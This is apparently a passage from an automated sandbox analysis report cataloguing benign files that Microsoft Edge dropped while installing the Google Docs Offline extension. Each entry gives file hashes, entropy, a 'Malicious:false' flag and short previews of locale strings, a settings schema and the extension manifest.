                                                                                                                                                                                                                                                                                                        SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1674
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                                        MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                                        SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                                        SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                                        SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1063
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                                        MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                                        SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                                        SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                                        SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1333
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                                        MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                                        SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                                        SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                                        SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1263
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                                        MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                                        SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                                        SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                                        SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1074
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                                        MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                                        SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                                        SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                                        SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):879
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                                        MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                                        SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                                        SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                                        SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1205
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                                        MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                                        SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                                        SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                                        SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):843
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                                        MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                                        SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                                        SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                                        SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):912
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                                        MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                                        SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                                        SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                                        SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):11406
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                                                        MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                                                        SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                                                        SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                                                        SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):854
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                                        MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                                        SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                                        SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                                        SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2525
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                                                        MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                                                        SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                                                        SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                                                        SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):97
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                                        MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                                        SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                                        SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                                        SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):122218
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.439997574414675
